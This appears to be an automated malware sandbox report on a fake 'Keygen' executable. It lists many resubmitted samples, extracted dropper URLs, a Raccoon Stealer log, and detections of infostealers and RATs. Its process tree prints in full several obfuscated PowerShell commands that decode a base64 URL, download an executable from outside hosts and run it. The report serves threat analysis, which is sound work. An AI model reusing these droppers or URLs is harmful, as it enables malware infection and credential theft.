Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:45:17 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (527 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 51 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (81) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (81) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\5199.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (81) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Users\Admin\AppData\Local\Temp\5199.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1756
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
          • C:\Users\Public\iup.exe
            "C:\Users\Public\iup.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2480
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2604
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                PID:3000
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 592
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2768
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2640
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                7⤵
                • Executes dropped EXE
                PID:2900
            • C:\Users\Public\iup.exe
              "C:\Users\Public\iup.exe"
              6⤵
              • Executes dropped EXE
              PID:2728
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\m1.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
      • C:\Windows\SysWOW64\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:1832
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5199.tmp\b.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:432
          • C:\Users\Public\qds.exe
            "C:\Users\Public\qds.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
              6⤵
              • Loads dropped DLL
              PID:2992
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:796
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                  8⤵
                  • Loads dropped DLL
                  PID:3020
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3056
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      10⤵
                      • Executes dropped EXE
                      PID:2440
